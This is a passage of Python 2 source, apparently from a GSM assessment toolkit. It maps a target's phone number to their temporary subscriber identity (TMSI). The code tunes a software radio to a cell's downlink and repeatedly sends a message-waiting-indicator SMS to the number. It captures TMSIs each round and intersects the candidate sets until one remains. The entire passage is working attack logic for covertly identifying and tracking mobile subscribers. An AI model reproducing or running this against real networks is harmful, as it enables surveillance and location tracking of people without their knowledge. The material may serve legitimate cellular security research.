arfcn.downlink2arfcn(freq, band) break elif arfcn is not None: if band: if not arfcn.is_valid_arfcn(arfcn, band): self.printmsg("ARFCN is not valid in the specified band") return else: freq = arfcn.arfcn2downlink(arfcn, band) else: for band in arfcn.get_bands(): if arfcn.is_valid_arfcn(arfcn, band): freq = arfcn.arfcn2downlink(arfcn, band) break # todo: stop if max_iterations < 6 response_queue = Queue.Queue() def callback(msg): response_queue.put(msg) adapter = GatAppSmsAdapter(self._config_provider, wait) adapter.register_read_callback(callback) candidates = set() i = 0 try: while i < max_iterations: flowgraph = TmsiLiveCapture(timeslot=timeslot, chan_mode=mode, fc=freq, arfcn=arfcn, samp_rate=sample_rate, ppm=ppm, gain=gain) with Silencer(): flowgraph.start() response_received = False adapter.send(sms_type=SmsType.MWID_Report, msisdn=msisdn, text=None) start = time.time() now = start while (now - start) < 15: if not response_queue.empty(): response = response_queue.get() # self.printmsg("response: " + response) if "Connection refused" in response.strip('\n'): self.printmsg("Failed to connect to GAT app") break response_msg = self.parse_response(response) response_type = response_msg[0] response_msisdn = response_msg[1] response_status = response_msg[2] if response_type == "sms-status": if response_status != "OK": self.printmsg("Sending to %s failed" % response_msisdn) else: pass # self.printmsg("SMS message to %s was sent." % response_msisdn) elif response_type == "sms-rcv": # recipient got our message response_received = True break if response_type == "sms-send" and response_status != "OK": self.printmsg("Sending to %s failed" % response_msisdn) elif response_type == "sms-delivery": if response_status != "OK": self.printmsg("Delivery to %s failed." % response_msisdn) else: self.printmsg("Response from %s received." % response_msisdn) time.sleep(0.2) # ToDo: No busy waiting ! now = time.time() if not response_received: self.printmsg("Timeout: no response to the ping") # return flowgraph.wait() flowgraph.stop() flowgraph = None iteration_candidates = self.read_tmsi_file() if i == 0: candidates = candidates.union(iteration_candidates) else: candidates = candidates.intersection(iteration_candidates) print "candidates: " + str(len(candidates)) if len(candidates) == 0: if i > 0: self.printmsg("No intersection found.") break else: self.printmsg("No TMSIs captured.") break elif len(candidates) == 1: result = candidates.pop() self.printmsg("Found TMSI: {}".format(result)) break i += 1 except Exception, e: print e finally: